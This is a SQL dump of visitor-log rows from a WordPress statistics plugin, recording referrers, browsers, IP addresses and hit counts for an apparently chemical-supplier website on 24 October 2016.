INSERT INTO `wp_statistics_visitor` VALUES (10890, '2016-10-24', 'https://www.google.com', 'Firefox', 'Windows', '38.0', '', '10.129.204.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10891, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '4.35.238.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10892, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10893, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.217.90.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10894, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '74.217.90.250', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10895, '2016-10-24', 'https://www.miller-stephenson.com/', 'Opera Next', 'Windows', '26.0.1656.60', '', '192.126.162.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10896, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.109.35.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10897, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.69.107.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10898, '2016-10-24', 'https://www.bing.com/search?q=3140+curing+agent&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '141.189.251.1', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10899, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=5&ved=0ahUKEwjNwqrz1vPPAhWEwj4KHdEmCqAQFgg1MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-ks-1220%2F&usg=AFQjCNGDBMAUR6SrT5MKK0-LiRSYQpCG5Q&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10900, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.1.148.130', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10901, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '24.127.212.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10902, '2016-10-24', 'https://www.google.com.tw/', 'Chrome', 'Windows', '54.0.2840.59', '', '114.36.115.118', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10903, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.45.60.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10904, '2016-10-24', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiJnaTE1_PPAhVHOoEKHTHkClgYABAA&ei=AB8OWNqdCIbxmAHUroyQCw&sig=AOD64_2_Ek6PMv0EcorqCY_C1SuBCVYM-g&rct=j&q=&sqi=2&ved=0ahUKEwjanZ_E1_PPAhWGOCYKHVQXA7IQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '216.114.195.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10905, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '69.34.53.157', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10906, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.205.62.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10907, '2016-10-24', 'https://www.google.com.ec/', 'Chrome', 'Windows', '53.0.2785.143', '', '186.4.217.118', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10908, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.206.170.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10909, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.218.234.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10910, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.163.9.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10911, '2016-10-24', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '173.13.105.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10912, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '193.18.60.2', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10913, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '130.105.225.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10914, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.178.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10915, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.210.12.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10916, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '173.220.212.58', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10917, '2016-10-24', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj92KGf3PPPAhVWNoEKHVPtD8cYABAP&sig=AOD64_0KLqsQHFYTeDyeUgQLVa4MC2xBzw&rct=j&q=&ved=0ahUKEwjvyp2f3PPPAhXC5iYKHbtzArMQ0QwIgwE&adurl=', 'MSIE', 'Windows', '11.0', '', '50.129.193.215', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10918, '2016-10-24', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '188.122.39.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10919, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.234.157.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10920, '2016-10-24', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '107.72.162.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10921, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.133.162.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10922, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.112.8.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10923, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10924, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.174.100.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10925, '2016-10-24', 'https://vavilone.com/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10926, '2016-10-24', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '173.167.153.82', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10927, '2016-10-24', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwitoaGb4PPPAhUOjmkKHf35AEUYABAH&sig=AOD64_2cHVo7xEvsfyX2PLy9mAGTmNp8Mg&rct=j&frm=1&q=&ved=0ahUKEwj86Jeb4PPPAhUG9IMKHd4YCdc4ChDRDAgu&adurl=', 'MSIE', 'Windows', '10.0', '', '174.0.248.127', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10928, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.95.54.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10929, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.165.244.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10930, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10931, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10932, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10933, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.179.48.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10934, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.120.34.237', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10935, '2016-10-24', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/vpf-krytox/', 'MSIE', 'Windows', '11.0', '', '140.180.254.251', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10936, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.173.191.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10937, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.199.37.18', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10938, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.39.137.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10939, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.101', '', '4.59.53.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10940, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.201.122.226', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10941, '2016-10-24', 'https://www.google.co.kr/', 'Safari', 'iPhone', '10.0', '', '110.46.76.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10942, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.93.149.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10943, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '50.250.225.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10944, '2016-10-24', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '96.86.189.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10945, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.240.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10946, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.41.144.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10947, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '185.145.67.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10948, '2016-10-24', 'https://www.google.de/', 'Safari', 'iPhone', '10.0', '', '91.60.235.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10949, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '92.111.102.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10950, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.139.36.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10951, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwi4qqyr6vPPAhUX0IMKHaQUCiwQFgg3MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA', 'MSIE', 'Windows', '11.0', '', '199.46.196.147', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10952, '2016-10-24', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjq99Kr6vPPAhXVhWgKHV9fCX4YABAF&sig=AOD64_0biAa5MAWbFnyrc4DYzHVFZlpcag&rct=j&q=&ved=0ahUKEwjbpc6r6vPPAhXIS7wKHQZhBqEQ0QwIJg&adurl=', 'MSIE', 'Windows', '11.0', '', '64.33.177.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10953, '2016-10-24', 'https://mschem.com/robots.txt', 'Chrome', 'Windows', '34.0.1847.137', '', '104.236.239.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10954, '2016-10-24', 'https://www.google.nl/', 'Chrome', 'Android', '53.0.2785.124', '', '81.205.196.55', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10955, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.197.21.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10956, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.27.147.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10957, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '218.92.147.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10958, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '55.24.227.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10959, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.84.169.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10960, '2016-10-24', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=43', 'MSIE', 'Windows', '9.0', '', '182.118.25.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10961, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.140.4.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10962, '2016-10-24', 'https://www.google.com.co/', 'Edge', 'Windows', '14.14393', '', '190.26.206.219', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10963, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10964, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '104.209.188.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10965, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '40.78.146.128', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10966, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10967, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.230.178.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10968, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10969, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10970, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '216.224.182.23', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10971, '2016-10-24', 'https://kinogonew.ru/', 'MSIE', 'Windows', '6.0', '', '176.8.88.141', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10972, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '128.205.24.135', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10973, '2016-10-24', 'https://www.globalspec.com/supplier/profile?vid=116074&sqid=18617030', 'Chrome', 'Windows', '53.0.2785.143', '', '67.83.37.83', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10974, '2016-10-24', 'https://mobplayer.net/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10975, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.137.240', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10976, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.106.105.212', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10977, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.163.221.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10978, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.53.21.72', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10979, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.110.44.153', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10980, '2016-10-24', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '209.133.79.5', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10981, '2016-10-24', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&sqi=2&ved=0ahUKEwiZ6tLu9fPPAhVo6IMKHWRQA9MQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.136593572,d.amc', 'Firefox', 'Windows', '27.0', '', '159.206.80.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10982, '2016-10-24', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '172.56.15.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10983, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.162.201.213', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10984, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.56.24.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10985, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.218.208.98', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10986, '2016-10-24', 'https://www.bing.com/search?q=MS-222N&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '132.3.33.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10987, '2016-10-24', 'https://www.bing.com/search?q=MS-222N&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '132.3.33.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10988, '2016-10-24', 'https://www.bing.com/search?q=MS-222N&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '132.3.33.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10989, '2016-10-24', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiI8-ma-PPPAhXWNoEKHbrPDwsYABAA&ei=Q0EOWO-aJMKOmQGHgaGQDg&sig=AOD64_3Mn8-sDntY60dp3jPebgz7eN_UEw&rct=j&q=&sqi=2&ved=0ahUKEwivyOaa-PPPAhVCRyYKHYdACOIQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '71.43.231.18', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10990, '2016-10-24', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.33.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10991, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '65.152.253.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10992, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '207.250.50.250', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10993, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10994, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10995, '2016-10-24', 'https://www.google.pt/', 'Chrome', 'Windows', '54.0.2840.71', '', '79.168.24.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10996, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiSiMf8-vPPAhVsz1QKHZmFBicQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=QTED1ls8P4bBkRbRt2ahjw&bvm=bv.136593572,d.cGw', 'MSIE', 'Windows', '11.0', '', '10.121.135.51', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10997, '2016-10-24', 'https://www.google.ca/', 'Chrome', 'Windows', '49.0.2623.112', '', '142.179.234.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10998, '2016-10-24', 'https://www.google.com', 'Firefox', 'Windows', '47.0', '', '167.206.204.250', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10999, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '71.1.121.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11000, '2016-10-24', 'https://www.google.es/', 'Firefox', 'Windows', '49.0', '', '91.116.136.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11001, '2016-10-24', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '108.81.227.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11002, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiJv4qY_fPPAhUjiVQKHUyzCQIQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '199.46.251.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11003, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.193.155.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11004, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '114.55.84.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11005, '2016-10-24', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '198.0.169.81', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11006, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.237.61.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11007, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.112.73.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11008, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '130.76.24.13', '000', 33, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11009, '2016-10-24', 'https://www.bing.com/search?q=miller-stephenson+chemical+co&form=IE11TR&src=IE11TR&pc=CMDTDFJS', 'MSIE', 'Windows', '11.0', '', '75.149.137.69', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11010, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.57.30.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11011, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.255.40.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11012, '2016-10-24', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.245.53.242', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11013, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '108.192.119.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11014, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.110.240', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11015, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '173.10.245.38', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11016, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.88.31.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11017, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.164.225.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11018, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjV8cKYgvTPAhVDOyYKHZXLAMoQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '134.223.116.151', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11019, '2016-10-24', 'https://www.bing.com/', 'Edge', 'Windows', '13.10586', '', '173.175.160.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11020, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '93.185.104.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11021, '2016-10-24', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '67.163.25.111', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11022, '2016-10-24', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.1', '', '162.248.147.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11023, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.221.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11024, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.19.22.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11025, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.206.154.44', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11026, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11027, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '69.137.39.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11028, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.63.196.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11029, '2016-10-24', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.223.116.157', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11030, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.107.126.110', '000', 2, 0); 
